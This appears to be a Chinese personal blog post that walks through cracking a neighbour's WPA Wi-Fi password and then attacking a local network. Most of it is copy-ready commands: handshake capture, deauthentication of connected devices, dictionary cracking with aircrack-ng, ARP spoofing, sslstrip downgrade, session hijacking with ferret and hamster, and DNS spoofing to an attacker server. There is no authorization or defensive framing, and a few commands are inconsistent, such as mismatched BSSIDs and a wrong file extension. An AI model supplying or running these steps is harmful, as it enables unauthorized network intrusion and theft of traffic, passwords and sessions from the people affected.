1.找一个字典文件


这里用 Kali Linux 自带的rockyou字典,
使用前先解压。
1
gzip -d /usr/share/wordlist/rockyou.txt.gz


2.断开链接的WiFi


1
airmon-ng


列出所有支持监控模式的网卡。

3.监听网卡

1
airmon-ng start wlan0

此时网卡就处于监听模式,被监听的网卡变为 wlan0mon。

可使用ifconfig命令查看。

4.查看WiFi网络


1
airodump-ng wlan0mon

可以看到周围WiFi的详细信息,包括信号强度、加密类型、频道(CH)等。

要记住破解WIFI的频道号和BSSID。

5.抓取握手包


1
airodump-ng -c 6 --bssid C8:3A:35:30:3E:C8 -w ~/ wlan0mon

6 频道号(CH)

C8:3A.... 目标BSSID号

-w 抓取数据包保存位置

6.强制让设备重连WiFi


原理:给链接到WiFi的一个设备发送一个deauth(反认证)包,让那个设备断开WiFi,
随后它自然会再次链接。
1
aireplay-ng -0 2 -a C8:3A:35:60:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon

-0 发送反认证包的个数

-a 指定路由器BSSID

-c 指定强制断开的设备

成功监听到握手包后:Ctrl+C 结束抓包。

1
airmon-ng stop wlan0mon

结束监听。

7.开始破解握手包密码


1
aircrack-ng -a2 -b C8:3A:35:60:3E:C8 -w /usr/share/wordlists/rockyou.txt ~/*.cap

-a2代表握手包

-b 指定要破解的WiFi BSSID

-w 指定字典文件

最后是抓取的包

评论和共享

嗅探,arp欺骗,会话劫持


工具:Kali Linux ettercap
第一次需要配置
1
2
3
4
5
/etc/ettercap/etter.conf
ec_uid = 0
ec_gid = 0
[linux]
if you use iptables 这行,将下面#去掉,打开转发。

1
2
3
4

/etc/NetworkManager/NetworkManager.conf
[ifupdown]
managed=true

改完后重启NetworkManager

1
service network-manager restart
1
2
cat /proc/sys/net/ipv4/ip_forward
echo 1>>/proc/sys/net/ipv4/ip_forward

ettercap

1
ettercap -T -M arp /// /// -q -i eth0

第一个 /// 是嗅探目标 –IP地址

第二个 /// 是嗅探网络 –网关地址
eth0 是网卡编号

driftnet 显示访问图片

1
driftnet -i eth0

arpspoof (同样需要开启路由转发)

1
arpspoof -i eth0 -t 被攻击者ip 攻击者ip

数据包捕获


tcpdump wireshark(图形界面)

1
tcpdump -i eth0 -w text.txt

drafnet

SSL数据嗅探


1
2
3
4
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sslstrip -p -l 10000 -w log.txt
之后开启ARP欺骗工具
用完记得取消 -A -> -D

session劫持-arp欺骗


1
2
3
4
5
6
arpspoof -i eth0 -t 192.168.14.2 192.168.14.132
tcpdump -i eth0 -w text.cap
ferret -r text.cpp
hamster
设置代理
http://hamster

session劫持-DNS欺骗


1
2
3
4
5
使用ettercap进行arp欺骗
vi /etc/ettercap/etter.dns
*.qq.com A 183.175.12.144
//修改dns到自己的服务器
dns_spoof

评论和共享

  • 第 1 页 共 1 页
作者的图片

Archie Shi

Nothing to say


Front-End Development Engineer